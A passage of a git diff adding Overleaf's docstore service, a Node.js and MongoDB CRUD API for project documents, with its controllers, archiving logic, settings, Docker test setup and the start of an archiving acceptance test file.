+ if (doc == null) { + res.sendStatus(404) + } else if (doc.deleted && !includeDeleted) { + res.sendStatus(404) + } else { + res.json(_buildDocView(doc)) + } + }) +} + +function peekDoc(req, res, next) { + const { doc_id: docId, project_id: projectId } = req.params + logger.debug({ projectId, docId }, 'peeking doc') + DocManager.peekDoc(projectId, docId, function (error, doc) { + if (error) { + return next(error) + } + if (doc == null) { + res.sendStatus(404) + } else { + res.setHeader('x-doc-status', doc.inS3 ? 'archived' : 'active') + res.json(_buildDocView(doc)) + } + }) +} + +function isDocDeleted(req, res, next) { + const { doc_id: docId, project_id: projectId } = req.params + DocManager.isDocDeleted(projectId, docId, function (error, deleted) { + if (error) { + return next(error) + } + res.json({ deleted }) + }) +} + +function getRawDoc(req, res, next) { + const { doc_id: docId, project_id: projectId } = req.params + logger.debug({ projectId, docId }, 'getting raw doc') + DocManager.getDocLines(projectId, docId, function (error, doc) { + if (error) { + return next(error) + } + if (doc == null) { + res.sendStatus(404) + } else { + res.setHeader('content-type', 'text/plain') + res.send(_buildRawDocView(doc)) + } + }) +} + +function getAllDocs(req, res, next) { + const { project_id: projectId } = req.params + logger.debug({ projectId }, 'getting all docs') + DocManager.getAllNonDeletedDocs( + projectId, + { lines: true, rev: true }, + function (error, docs) { + if (docs == null) { + docs = [] + } + if (error) { + return next(error) + } + const docViews = _buildDocsArrayView(projectId, docs) + for (const docView of docViews) { + if (!docView.lines) { + logger.warn({ projectId, docId: docView._id }, 'missing doc lines') + docView.lines = [] + } + } + res.json(docViews) + } + ) +} + +function getAllDeletedDocs(req, res, next) { + const { project_id: projectId } = req.params + logger.debug({ projectId }, 'getting all deleted docs') + DocManager.getAllDeletedDocs( + projectId, + { name: true, deletedAt: true }, + function (error, docs) { + if (error) { + return next(error) + } + res.json( + docs.map(doc => ({ + _id: doc._id.toString(), + name: doc.name, + deletedAt: doc.deletedAt, + })) + ) + } + ) +} + +function getAllRanges(req, res, next) { + const { project_id: projectId } = req.params + logger.debug({ projectId }, 'getting all ranges') + DocManager.getAllNonDeletedDocs( + projectId, + { ranges: true }, + function (error, docs) { + if (docs == null) { + docs = [] + } + if (error) { + return next(error) + } + res.json(_buildDocsArrayView(projectId, docs)) + } + ) +} + +function projectHasRanges(req, res, next) { + const { project_id: projectId } = req.params + DocManager.projectHasRanges(projectId, (err, projectHasRanges) => { + if (err) { + return next(err) + } + res.json({ projectHasRanges }) + }) +} + +function updateDoc(req, res, next) { + const { doc_id: docId, project_id: projectId } = req.params + const lines = req.body?.lines + const version = req.body?.version + const ranges = req.body?.ranges + + if (lines == null || !(lines instanceof Array)) { + logger.error({ projectId, docId }, 'no doc lines provided') + res.sendStatus(400) // Bad Request + return + } + + if (version == null || typeof version !== 'number') { + logger.error({ projectId, docId }, 'no doc version provided') + res.sendStatus(400) // Bad Request + return + } + + if (ranges == null) { + logger.error({ projectId, docId }, 'no doc ranges provided') + res.sendStatus(400) // Bad Request + return + } + + const bodyLength = lines.reduce((len, line) => line.length + len, 0) + if (bodyLength > Settings.max_doc_length) { + logger.error({ projectId, docId, bodyLength }, 'document body too large') + res.status(413).send('document body too large') + return + } + + logger.debug({ projectId, docId }, 'got http request to update doc') + DocManager.updateDoc( + projectId, + docId, + lines, + version, + ranges, + function (error, modified, rev) { + if (error) { + return next(error) + } + res.json({ + modified, + rev, + }) + } + ) +} + +function patchDoc(req, res, next) { + const { doc_id: docId, project_id: projectId } = req.params + logger.debug({ projectId, docId }, 'patching doc') + + const allowedFields = ['deleted', 'deletedAt', 'name'] + const meta = {} + Object.entries(req.body).forEach(([field, value]) => { + if (allowedFields.includes(field)) { + meta[field] = value + } else { + logger.fatal({ field }, 'joi validation for pathDoc is broken') + } + }) + DocManager.patchDoc(projectId, docId, meta, function (error) { + if (error) { + return next(error) + } + res.sendStatus(204) + }) +} + +function _buildDocView(doc) { + const docView = { _id: doc._id?.toString() } + for (const attribute of ['lines', 'rev', 'version', 'ranges', 'deleted']) { + if (doc[attribute] != null) { + docView[attribute] = doc[attribute] + } + } + return docView +} + +function _buildRawDocView(doc) { + return (doc?.lines ?? []).join('\n') +} + +function _buildDocsArrayView(projectId, docs) { + const docViews = [] + for (const doc of docs) { + if (doc != null) { + // There can end up being null docs for some reason :( (probably a race condition) + docViews.push(_buildDocView(doc)) + } else { + logger.error( + { err: new Error('null doc'), projectId }, + 'encountered null doc' + ) + } + } + return docViews +} + +function archiveAllDocs(req, res, next) { + const { project_id: projectId } = req.params + logger.debug({ projectId }, 'archiving all docs') + DocArchive.archiveAllDocs(projectId, function (error) { + if (error) { + return next(error) + } + res.sendStatus(204) + }) +} + +function archiveDoc(req, res, next) { + const { doc_id: docId, project_id: projectId } = req.params + logger.debug({ projectId, docId }, 'archiving a doc') + DocArchive.archiveDoc(projectId, docId, function (error) { + if (error) { + return next(error) + } + res.sendStatus(204) + }) +} + +function unArchiveAllDocs(req, res, next) { + const { project_id: projectId } = req.params + logger.debug({ projectId }, 'unarchiving all docs') + DocArchive.unArchiveAllDocs(projectId, function (err) { + if (err) { + if (err instanceof Errors.DocRevValueError) { + logger.warn({ err }, 'Failed to unarchive doc') + return res.sendStatus(409) + } + return next(err) + } + res.sendStatus(200) + }) +} + +function destroyProject(req, res, next) { + const { project_id: projectId } = req.params + logger.debug({ projectId }, 'destroying all docs') + DocArchive.destroyProject(projectId, function (error) { + if (error) { + return next(error) + } + res.sendStatus(204) + }) +} + +function healthCheck(req, res) { + HealthChecker.check(function (err) { + if (err) { + logger.err({ err }, 'error performing health check') + res.sendStatus(500) + } else { + res.sendStatus(200) + } + }) +} + +module.exports = { + getDoc, + peekDoc, + isDocDeleted, + getRawDoc, + getAllDocs, + getAllDeletedDocs, + getAllRanges, + projectHasRanges, + updateDoc, + patchDoc, + archiveAllDocs, + archiveDoc, + unArchiveAllDocs, + destroyProject, + healthCheck, +} diff --git a/services/docstore/app/js/MongoManager.js b/services/docstore/app/js/MongoManager.js new file mode 100644 index 0000000..ad1a2d2 --- /dev/null +++ b/services/docstore/app/js/MongoManager.js @@ -0,0 +1,274 @@ +const { db, ObjectId } = require('./mongodb') +const Settings = require('@overleaf/settings') +const Errors = require('./Errors') +const { callbackify } = require('node:util') + +const ARCHIVING_LOCK_DURATION_MS = Settings.archivingLockDurationMs + +async function findDoc(projectId, docId, projection) { + const doc = await db.docs.findOne( + { + _id: new ObjectId(docId.toString()), + project_id: new ObjectId(projectId.toString()), + }, + { projection } + ) + if (doc && projection.version && !doc.version) { + doc.version = 0 + } + return doc +} + +async function getProjectsDeletedDocs(projectId, projection) { + const docs = await db.docs + .find( + { + project_id: new ObjectId(projectId.toString()), + deleted: true, + }, + { + projection, + sort: { deletedAt: -1 }, + limit: Settings.max_deleted_docs, + } + ) + .toArray() + return docs +} + +async function getProjectsDocs(projectId, options, projection) { + const query = { project_id: new ObjectId(projectId.toString()) } + if (!options.include_deleted) { + query.deleted = { $ne: true } + } + const queryOptions = { + projection, + } + if (options.limit) { + queryOptions.limit = options.limit + } + const docs = await db.docs.find(query, queryOptions).toArray() + return docs +} + +async function getArchivedProjectDocs(projectId, maxResults) { + const query = { + project_id: new ObjectId(projectId.toString()), + inS3: true, + } + const docs = await db.docs + .find(query, { projection: { _id: 1 }, limit: maxResults }) + .toArray() + return docs +} + +async function getNonArchivedProjectDocIds(projectId) { + const docs = await db.docs + .find( + { + project_id: new ObjectId(projectId), + inS3: { $ne: true }, + }, + { projection: { _id: 1 } } + ) + .map(doc => doc._id) + .toArray() + return docs +} + +async function getNonDeletedArchivedProjectDocs(projectId, maxResults) { + const query = { + project_id: new ObjectId(projectId.toString()), + deleted: { $ne: true }, + inS3: true, + } + const docs = await db.docs + .find(query, { projection: { _id: 1 }, limit: maxResults }) + .toArray() + return docs +} + +async function upsertIntoDocCollection(projectId, docId, previousRev, updates) { + if (previousRev) { + const update = { + $set: updates, + $unset: { inS3: true }, + } + if (updates.lines || updates.ranges) { + update.$inc = { rev: 1 } + } + const result = await db.docs.updateOne( + { + _id: new ObjectId(docId), + project_id: new ObjectId(projectId), + rev: previousRev, + }, + update + ) + if (result.matchedCount !== 1) { + throw new Errors.DocRevValueError() + } + } else { + try { + await db.docs.insertOne({ + _id: new ObjectId(docId), + project_id: new ObjectId(projectId), + rev: 1, + ...updates, + }) + } catch (err) { + if (err.code === 11000) { + // duplicate doc _id + throw new Errors.DocRevValueError() + } else { + throw err + } + } + } +} + +async function patchDoc(projectId, docId, meta) { + await db.docs.updateOne( + { + _id: new ObjectId(docId), + project_id: new ObjectId(projectId), + }, + { $set: meta } + ) +} + +/** + * Fetch a doc and lock it for archiving + * + * This will return null if the doc is not found, if it's already archived or + * if the lock can't be acquired. + */ +async function getDocForArchiving(projectId, docId) { + const archivingUntil = new Date(Date.now() + ARCHIVING_LOCK_DURATION_MS) + const result = await db.docs.findOneAndUpdate( + { + _id: new ObjectId(docId), + project_id: new ObjectId(projectId), + inS3: { $ne: true }, + $or: [{ archivingUntil: null }, { archivingUntil: { $lt: new Date() } }], + }, + { $set: { archivingUntil } }, + { + projection: { lines: 1, ranges: 1, rev: 1 }, + includeResultMetadata: true, + } + ) + return result.value +} + +/** + * Clear the doc contents from Mongo and release the archiving lock + */ +async function markDocAsArchived(projectId, docId, rev) { + await db.docs.updateOne( + { _id: new ObjectId(docId), rev }, + { + $set: { inS3: true }, + $unset: { lines: 1, ranges: 1, archivingUntil: 1 }, + } + ) +} + +/** + * Restore an archived doc + * + * This checks that the archived doc's rev matches. + */ +async function restoreArchivedDoc(projectId, docId, archivedDoc) { + const query = { + _id: new ObjectId(docId), + project_id: new ObjectId(projectId), + rev: archivedDoc.rev, + } + const update = { + $set: { + lines: archivedDoc.lines, + ranges: archivedDoc.ranges || {}, + }, + $unset: { + inS3: true, + }, + } + const result = await db.docs.updateOne(query, update) + + if (result.matchedCount === 0) { + throw new Errors.DocRevValueError('failed to unarchive doc', { + docId, + rev: archivedDoc.rev, + }) + } +} + +async function getDocRev(docId) { + const doc = await db.docs.findOne( + { _id: new ObjectId(docId.toString()) }, + { projection: { rev: 1 } } + ) + return doc && doc.rev +} + +/** + * Helper method to support optimistic locking. + * + * Check that the rev of an existing doc is unchanged. If the rev has + * changed, return a DocModifiedError. + */ +async function checkRevUnchanged(doc) { + const currentRev = await getDocRev(doc._id) + if (isNaN(currentRev) || isNaN(doc.rev)) { + throw new Errors.DocRevValueError('doc rev is NaN', { + doc_id: doc._id, + rev: doc.rev, + currentRev, + }) + } + if (doc.rev !== currentRev) { + throw new Errors.DocModifiedError('doc rev has changed', { + doc_id: doc._id, + rev: doc.rev, + currentRev, + }) + } +} + +async function destroyProject(projectId) { + await db.docs.deleteMany({ project_id: new ObjectId(projectId) }) +} + +module.exports = { + findDoc: callbackify(findDoc), + getProjectsDeletedDocs: callbackify(getProjectsDeletedDocs), + getProjectsDocs: callbackify(getProjectsDocs), + getArchivedProjectDocs: callbackify(getArchivedProjectDocs), + getNonArchivedProjectDocIds: callbackify(getNonArchivedProjectDocIds), + getNonDeletedArchivedProjectDocs: callbackify( + getNonDeletedArchivedProjectDocs + ), + upsertIntoDocCollection: callbackify(upsertIntoDocCollection), + restoreArchivedDoc: callbackify(restoreArchivedDoc), + patchDoc: callbackify(patchDoc), + getDocForArchiving: callbackify(getDocForArchiving), + markDocAsArchived: callbackify(markDocAsArchived), + checkRevUnchanged: callbackify(checkRevUnchanged), + destroyProject: callbackify(destroyProject), + promises: { + findDoc, + getProjectsDeletedDocs, + getProjectsDocs, + getArchivedProjectDocs, + getNonArchivedProjectDocIds, + getNonDeletedArchivedProjectDocs, + upsertIntoDocCollection, + restoreArchivedDoc, + patchDoc, + getDocForArchiving, + markDocAsArchived, + checkRevUnchanged, + destroyProject, + }, +} diff --git a/services/docstore/app/js/PersistorManager.js b/services/docstore/app/js/PersistorManager.js new file mode 100644 index 0000000..5838271 --- /dev/null +++ b/services/docstore/app/js/PersistorManager.js @@ -0,0 +1,12 @@ +const settings = require('@overleaf/settings') + +const persistorSettings = settings.docstore +persistorSettings.Metrics = require('@overleaf/metrics') + +const ObjectPersistor = require('@overleaf/object-persistor') +const AbstractPersistor = require('@overleaf/object-persistor/src/AbstractPersistor') +const persistor = settings.docstore.backend + ? ObjectPersistor(persistorSettings) + : new AbstractPersistor() + +module.exports = persistor diff --git a/services/docstore/app/js/RangeManager.js b/services/docstore/app/js/RangeManager.js new file mode 100644 index 0000000..f36f68f --- /dev/null +++ b/services/docstore/app/js/RangeManager.js @@ -0,0 +1,68 @@ +/* eslint-disable + no-return-assign, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +let RangeManager +const _ = require('lodash') +const { ObjectId } = require('./mongodb') + +module.exports = RangeManager = { + shouldUpdateRanges(docRanges, incomingRanges) { + if (incomingRanges == null) { + throw new Error('expected incoming_ranges') + } + + // If the ranges are empty, we don't store them in the DB, so set + // doc_ranges to an empty object as default, since this is was the + // incoming_ranges will be for an empty range set. + if (docRanges == null) { + docRanges = {} + } + + return !_.isEqual(docRanges, incomingRanges) + }, + + jsonRangesToMongo(ranges) { + if (ranges == null) { + return null + } + + const updateMetadata = function (metadata) { + if ((metadata != null ? metadata.ts : undefined) != null) { + metadata.ts = new Date(metadata.ts) + } + if ((metadata != null ? metadata.user_id : undefined) != null) { + return (metadata.user_id = RangeManager._safeObjectId(metadata.user_id)) + } + } + + for (const change of Array.from(ranges.changes || [])) { + change.id = RangeManager._safeObjectId(change.id) + updateMetadata(change.metadata) + } + for (const comment of Array.from(ranges.comments || [])) { + comment.id = RangeManager._safeObjectId(comment.id) + if ((comment.op != null ? comment.op.t : undefined) != null) { + comment.op.t = RangeManager._safeObjectId(comment.op.t) + } + updateMetadata(comment.metadata) + } + return ranges + }, + + _safeObjectId(data) { + try { + return new ObjectId(data) + } catch (error) { + return data + } + }, +} diff --git a/services/docstore/app/js/StreamToBuffer.js b/services/docstore/app/js/StreamToBuffer.js new file mode 100644 index 0000000..7de146c --- /dev/null +++ b/services/docstore/app/js/StreamToBuffer.js @@ -0,0 +1,28 @@ +const { LoggerStream, WritableBuffer } = require('@overleaf/stream-utils') +const Settings = require('@overleaf/settings') +const logger = require('@overleaf/logger/logging-manager') +const { pipeline } = require('node:stream/promises') +const { callbackify } = require('node:util') + +module.exports = { + streamToBuffer: callbackify(streamToBuffer), + promises: { + streamToBuffer, + }, +} + +async function streamToBuffer(projectId, docId, stream) { + const loggerTransform = new LoggerStream( + Settings.max_doc_length, + (size, isFlush) => { + logger.warn( + { projectId, docId, size, finishedReading: isFlush }, + 'potentially large doc pulled down from gcs' + ) + } + ) + + const buffer = new WritableBuffer() + await pipeline(stream, loggerTransform, buffer) + return buffer.contents() +} diff --git a/services/docstore/app/js/mongodb.js b/services/docstore/app/js/mongodb.js new file mode 100644 index 0000000..796cd6c --- /dev/null +++ b/services/docstore/app/js/mongodb.js @@ -0,0 +1,18 @@ +const Metrics = require('@overleaf/metrics') +const Settings = require('@overleaf/settings') +const { MongoClient, ObjectId } = require('mongodb-legacy') + +const mongoClient = new MongoClient(Settings.mongo.url, Settings.mongo.options) +const mongoDb = mongoClient.db() + +const db = { + docs: mongoDb.collection('docs'), +} + +Metrics.mongodb.monitor(mongoClient) + +module.exports = { + db, + mongoClient, + ObjectId, +} diff --git a/services/docstore/buildscript.txt b/services/docstore/buildscript.txt new file mode 100644 index 0000000..c329d7b --- /dev/null +++ b/services/docstore/buildscript.txt @@ -0,0 +1,9 @@ +docstore +--dependencies=mongo,gcs +--docker-repos=us-east1-docker.pkg.dev/overleaf-ops/ol-docker +--env-add= +--env-pass-through= +--esmock-loader=False +--node-version=20.18.2 +--public-repo=True +--script-version=4.7.0 diff --git a/services/docstore/config/settings.defaults.js b/services/docstore/config/settings.defaults.js new file mode 100644 index 0000000..9ad506a --- /dev/null +++ b/services/docstore/config/settings.defaults.js @@ -0,0 +1,92 @@ +const http = require('node:http') +const https = require('node:https') + +http.globalAgent.maxSockets = 300 +http.globalAgent.keepAlive = false +https.globalAgent.keepAlive = false + +const Settings = { + internal: { + docstore: { + port: 3016, + host: process.env.LISTEN_ADDRESS || '127.0.0.1', + }, + }, + + mongo: { + options: { + monitorCommands: true, + }, + }, + + docstore: { + archiveOnSoftDelete: process.env.ARCHIVE_ON_SOFT_DELETE === 'true', + keepSoftDeletedDocsArchived: + process.env.KEEP_SOFT_DELETED_DOCS_ARCHIVED === 'true', + + backend: process.env.BACKEND, + healthCheck: { + project_id: process.env.HEALTH_CHECK_PROJECT_ID, + }, + bucket: process.env.BUCKET_NAME || process.env.AWS_BUCKET || 'bucket', + gcs: { + unlockBeforeDelete: process.env.GCS_UNLOCK_BEFORE_DELETE === 'true', + deletedBucketSuffix: process.env.GCS_DELETED_BUCKET_SUFFIX, + deleteConcurrency: parseInt(process.env.GCS_DELETE_CONCURRENCY) || 50, + }, + }, + + max_deleted_docs: parseInt(process.env.MAX_DELETED_DOCS, 10) || 2000, + + max_doc_length: parseInt(process.env.MAX_DOC_LENGTH) || 2 * 1024 * 1024, // 2mb + + maxJsonRequestSize: + parseInt(process.env.MAX_JSON_REQUEST_SIZE) || 6 * 1024 * 1024, // 6 MB + + unArchiveBatchSize: parseInt(process.env.UN_ARCHIVE_BATCH_SIZE, 10) || 50, + parallelArchiveJobs: parseInt(process.env.PARALLEL_ARCHIVE_JOBS, 10) || 5, + archivingLockDurationMs: + parseInt(process.env.ARCHIVING_LOCK_DURATION_MS, 10) || 60000, +} + +if (process.env.MONGO_CONNECTION_STRING) { + Settings.mongo.url = process.env.MONGO_CONNECTION_STRING +} else if (process.env.MONGO_HOST) { + Settings.mongo.url = `mongodb://${process.env.MONGO_HOST}/sharelatex` +} else { + Settings.mongo.url = 'mongodb://127.0.0.1/sharelatex' +} + +if ( + process.env.AWS_ACCESS_KEY_ID && + process.env.AWS_SECRET_ACCESS_KEY && + process.env.AWS_BUCKET +) { + Settings.docstore.s3 = { + key: process.env.AWS_ACCESS_KEY_ID, + secret: process.env.AWS_SECRET_ACCESS_KEY, + bucket: process.env.AWS_BUCKET, + endpoint: process.env.AWS_S3_ENDPOINT, + pathStyle: process.env.AWS_S3_PATH_STYLE, + partSize: parseInt(process.env.AWS_S3_PARTSIZE) || 100 * 1024 * 1024, + } +} + +if (process.env.GCS_API_ENDPOINT) { + Settings.docstore.gcs.endpoint = { + apiEndpoint: process.env.GCS_API_ENDPOINT, + projectId: process.env.GCS_PROJECT_ID, + } +} + +if (process.env.FALLBACK_BACKEND) { + Settings.docstore.fallback = { + backend: process.env.FALLBACK_BACKEND, + // mapping of bucket names on the fallback, to bucket names on the primary. + // e.g. { myS3UserFilesBucketName: 'myGoogleUserFilesBucketName' } + buckets: JSON.parse(process.env.FALLBACK_BUCKET_MAPPING || '{}'), + copyOnMiss: process.env.COPY_ON_MISS === 'true', + } +} + +module.exports = Settings diff --git a/services/docstore/docker-compose.ci.yml b/services/docstore/docker-compose.ci.yml new file mode 100644 index 0000000..a1a9995 --- /dev/null +++ b/services/docstore/docker-compose.ci.yml @@ -0,0 +1,64 @@ +# This file was auto-generated, do not edit it directly. +# Instead run bin/update_build_scripts from +# https://github.com/overleaf/internal/ + +version: "2.3" + +services: + test_unit: + image: ci/$PROJECT_NAME:$BRANCH_NAME-$BUILD_NUMBER + user: node + command: npm run test:unit:_run + environment: + NODE_ENV: test + NODE_OPTIONS: "--unhandled-rejections=strict" + + + test_acceptance: + build: . + image: ci/$PROJECT_NAME:$BRANCH_NAME-$BUILD_NUMBER + environment: + ELASTIC_SEARCH_DSN: es:9200 + MONGO_HOST: mongo + POSTGRES_HOST: postgres + GCS_API_ENDPOINT: http://gcs:9090 + GCS_PROJECT_ID: fake + STORAGE_EMULATOR_HOST: http://gcs:9090/storage/v1 + MOCHA_GREP: ${MOCHA_GREP} + NODE_ENV: test + NODE_OPTIONS: "--unhandled-rejections=strict" + depends_on: + mongo: + condition: service_started + gcs: + condition: service_healthy + user: node + command: npm run test:acceptance + + + tar: + build: . + image: ci/$PROJECT_NAME:$BRANCH_NAME-$BUILD_NUMBER + volumes: + - ./:/tmp/build/ + command: tar -czf /tmp/build/build.tar.gz --exclude=build.tar.gz --exclude-vcs . + user: root + mongo: + image: mongo:6.0.13 + command: --replSet overleaf + volumes: + - ../../bin/shared/mongodb-init-replica-set.js:/docker-entrypoint-initdb.d/mongodb-init-replica-set.js + environment: + MONGO_INITDB_DATABASE: sharelatex + extra_hosts: + # Required when using the automatic database setup for initializing the + # replica set. This override is not needed when running the setup after + # starting up mongo. + - mongo:127.0.0.1 + gcs: + image: fsouza/fake-gcs-server:1.45.2 + command: ["--port=9090", "--scheme=http"] + healthcheck: + test: wget --quiet --output-document=/dev/null http://localhost:9090/storage/v1/b + interval: 1s + retries: 20 diff --git a/services/docstore/docker-compose.yml b/services/docstore/docker-compose.yml new file mode 100644 index 0000000..93a029b --- /dev/null +++ b/services/docstore/docker-compose.yml @@ -0,0 +1,68 @@ +# This file was auto-generated, do not edit it directly. +# Instead run bin/update_build_scripts from +# https://github.com/overleaf/internal/ + +version: "2.3" + +services: + test_unit: + image: node:20.18.2 + volumes: + - .:/overleaf/services/docstore + - ../../node_modules:/overleaf/node_modules + - ../../libraries:/overleaf/libraries + working_dir: /overleaf/services/docstore + environment: + MOCHA_GREP: ${MOCHA_GREP} + LOG_LEVEL: ${LOG_LEVEL:-} + NODE_ENV: test + NODE_OPTIONS: "--unhandled-rejections=strict" + command: npm run --silent test:unit + user: node + + test_acceptance: + image: node:20.18.2 + volumes: + - .:/overleaf/services/docstore + - ../../node_modules:/overleaf/node_modules + - ../../libraries:/overleaf/libraries + working_dir: /overleaf/services/docstore + environment: + ELASTIC_SEARCH_DSN: es:9200 + MONGO_HOST: mongo + POSTGRES_HOST: postgres + GCS_API_ENDPOINT: http://gcs:9090 + GCS_PROJECT_ID: fake + STORAGE_EMULATOR_HOST: http://gcs:9090/storage/v1 + MOCHA_GREP: ${MOCHA_GREP} + LOG_LEVEL: ${LOG_LEVEL:-} + NODE_ENV: test + NODE_OPTIONS: "--unhandled-rejections=strict" + user: node + depends_on: + mongo: + condition: service_started + gcs: + condition: service_healthy + command: npm run --silent test:acceptance + + mongo: + image: mongo:6.0.13 + command: --replSet overleaf + volumes: + - ../../bin/shared/mongodb-init-replica-set.js:/docker-entrypoint-initdb.d/mongodb-init-replica-set.js + environment: + MONGO_INITDB_DATABASE: sharelatex + extra_hosts: + # Required when using the automatic database setup for initializing the + # replica set. This override is not needed when running the setup after + # starting up mongo. + - mongo:127.0.0.1 + + gcs: + image: fsouza/fake-gcs-server:1.45.2 + command: ["--port=9090", "--scheme=http"] + healthcheck: + test: wget --quiet --output-document=/dev/null http://localhost:9090/storage/v1/b + interval: 1s + retries: 20 diff --git a/services/docstore/package.json b/services/docstore/package.json new file mode 100644 index 0000000..e505f73 --- /dev/null +++ b/services/docstore/package.json @@ -0,0 +1,47 @@ +{ + "name": "@overleaf/docstore", + "description": "A CRUD API for handling text documents in projects", + "private": true, + "main": "app.js", + "scripts": { + "start": "node app.js", + "test:acceptance:_run": "mocha --recursive --reporter spec --timeout 15000 --exit $@ test/acceptance/js", + "test:acceptance": "npm run test:acceptance:_run -- --grep=$MOCHA_GREP", + "test:unit:_run": "mocha --recursive --reporter spec $@ test/unit/js", + "test:unit": "npm run test:unit:_run -- --grep=$MOCHA_GREP", + "nodemon": "node --watch app.js", + "lint": "eslint --max-warnings 0 --format unix .", + "format": "prettier --list-different $PWD/'**/*.*js'", + "format:fix": "prettier --write $PWD/'**/*.*js'", + "lint:fix": "eslint --fix .", + "types:check": "tsc --noEmit" + }, + "dependencies": { + "@overleaf/logger": "*", + "@overleaf/metrics": "*", + "@overleaf/o-error": "*", + "@overleaf/object-persistor": "*", + "@overleaf/promise-utils": "*", + "@overleaf/settings": "*", + "@overleaf/stream-utils": "^0.1.0", + "async": "^3.2.5", + "body-parser": "^1.20.3", + "bunyan": "^1.8.15", + "celebrate": "^15.0.3", + "express": "^4.21.2", + "lodash": "^4.17.21", + "mongodb-legacy": "6.1.3", + "p-map": "^4.0.0", + "request": "^2.88.2" + }, + "devDependencies": { + "@google-cloud/storage": "^6.10.1", + "chai": "^4.3.6", + "chai-as-promised": "^7.1.1", + "mocha": "^11.1.0", + "sandboxed-module": "~2.0.4", + "sinon": "~9.0.2", + "sinon-chai": "^3.7.0", + "typescript": "^5.0.4" + } +} diff --git a/services/docstore/test/acceptance/deps/Dockerfile.fake-gcs b/services/docstore/test/acceptance/deps/Dockerfile.fake-gcs new file mode 100644 index 0000000..0e6de7e --- /dev/null +++ b/services/docstore/test/acceptance/deps/Dockerfile.fake-gcs @@ -0,0 +1,5 @@ +FROM fsouza/fake-gcs-server:latest +RUN apk add --update --no-cache curl +COPY healthcheck.sh /healthcheck.sh +HEALTHCHECK --interval=1s --timeout=1s --retries=30 CMD /healthcheck.sh http://localhost:9090 +CMD ["--port=9090", "--scheme=http"] diff --git a/services/docstore/test/acceptance/deps/healthcheck.sh b/services/docstore/test/acceptance/deps/healthcheck.sh new file mode 100644 index 0000000..675c205 --- /dev/null +++ b/services/docstore/test/acceptance/deps/healthcheck.sh @@ -0,0 +1,9 @@ +#!/bin/sh + +# health check to allow 404 status code as valid +STATUSCODE=$(curl --silent --output /dev/null --write-out "%{http_code}" "$1") +# will be 000 on non-http error (e.g. connection failure) +if test "$STATUSCODE" -ge 500 || test "$STATUSCODE" -lt 200; then + exit 1 +fi +exit 0 diff --git a/services/docstore/test/acceptance/js/ArchiveDocsTests.js b/services/docstore/test/acceptance/js/ArchiveDocsTests.js new file mode 100644 index 0000000..d922810 --- /dev/null +++ b/services/docstore/test/acceptance/js/ArchiveDocsTests.js @@ -0,0 +1,1239 @@ +/* eslint-disable + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ + +const Settings = require('@overleaf/settings') +const { expect } = require('chai') +const { db, ObjectId } = require('../../../app/js/mongodb') +const async = require('async') +const DocstoreApp = require('./helpers/DocstoreApp') +const DocstoreClient = require('./helpers/DocstoreClient') +const { Storage } = require('@google-cloud/storage') +const Persistor = require('../../../app/js/PersistorManager') +const { ReadableString } = require('@overleaf/stream-utils') + +function uploadContent(path, json, callback) { + const stream = new ReadableString(JSON.stringify(json)) + Persistor.sendStream(Settings.docstore.bucket, path, stream) + .then(() => callback()) + .catch(callback) +} + +describe('Archiving', function () { + before(function (done) { + return DocstoreApp.ensureRunning(done) + }) + + before(async function () { + const storage = new Storage(Settings.docstore.gcs.endpoint) + await storage.createBucket(Settings.docstore.bucket) + await storage.createBucket(`${Settings.docstore.bucket}-deleted`) + }) + + after(async function () { + // Tear down the buckets created above + const storage = new Storage(Settings.docstore.gcs.endpoint) + await storage.bucket(Settings.docstore.bucket).deleteFiles() + await storage.bucket(Settings.docstore.bucket).delete() + await storage.bucket(`${Settings.docstore.bucket}-deleted`).deleteFiles() + await storage.bucket(`${Settings.docstore.bucket}-deleted`).delete() + }) + + describe('multiple docs in a project', function () { + before(function (done) { + this.project_id = new ObjectId() + this.docs = [ + { + _id: new ObjectId(), + lines: ['one', 'two', 'three'], + ranges: {}, + version: 2, + }, + { + _id: new ObjectId(), + lines: ['aaa', 'bbb', 'ccc'], + ranges: {}, + version: 4, + }, + ] + const jobs = Array.from(this.docs).map(doc => + (doc => { + return callback => { + return DocstoreClient.createDoc( + this.project_id, + doc._id, + doc.lines, + doc.version, + doc.ranges, + callback + ) + } + })(doc) + ) + + return async.series(jobs, error => { + if (error != null) { + throw error + } + return DocstoreClient.archiveAllDoc(this.project_id, (error, res) => { + if (error) return done(error) + this.res = res + return done() + }) + }) + }) + + it('should archive all the docs', function (done) { + this.res.statusCode.should.equal(204) + return done() + }) + + it('should set inS3 and unset lines and ranges in each doc', function (done) { + const jobs = Array.from(this.docs).map(doc => + (doc => { + return callback => { + return db.docs.findOne({ _id: doc._id }, (error, doc) => { + if (error) return callback(error) + expect(doc.lines).not.to.exist + expect(doc.ranges).not.to.exist + doc.inS3.should.equal(true) + return callback() + }) + } + })(doc) + ) + return async.series(jobs, done) + }) + + it('should set the docs in s3 correctly', function (done) { + const jobs = Array.from(this.docs).map(doc => + (doc => { + return callback => { + return DocstoreClient.getS3Doc( + this.project_id, + doc._id, + (error, s3Doc) => { + if (error) return callback(error) + s3Doc.lines.should.deep.equal(doc.lines) + s3Doc.ranges.should.deep.equal(doc.ranges) + callback() + } + ) + } + })(doc) + ) + return async.series(jobs, done) + }) + + return describe('after unarchiving from a request for the project', function () { + before(function (done) { + return DocstoreClient.getAllDocs( + this.project_id, + (error, res, fetchedDocs) => { + this.fetched_docs = fetchedDocs + if (error != null) { + throw error + } + return done() + } + ) + }) + + it('should return the docs', function (done) { + for (let i = 0; i < this.fetched_docs.length; i++) { + const doc = this.fetched_docs[i] + doc.lines.should.deep.equal(this.docs[i].lines) + } + return done() + }) + + return it('should restore the docs to mongo', function (done) { + const jobs = Array.from(this.docs).map((doc, i) => + ((doc, i) => { + return callback => { + return db.docs.findOne({ _id: doc._id }, (error, doc) => { + if (error) return callback(error) + doc.lines.should.deep.equal(this.docs[i].lines) + doc.ranges.should.deep.equal(this.docs[i].ranges) + expect(doc.inS3).not.to.exist + return callback() + }) + 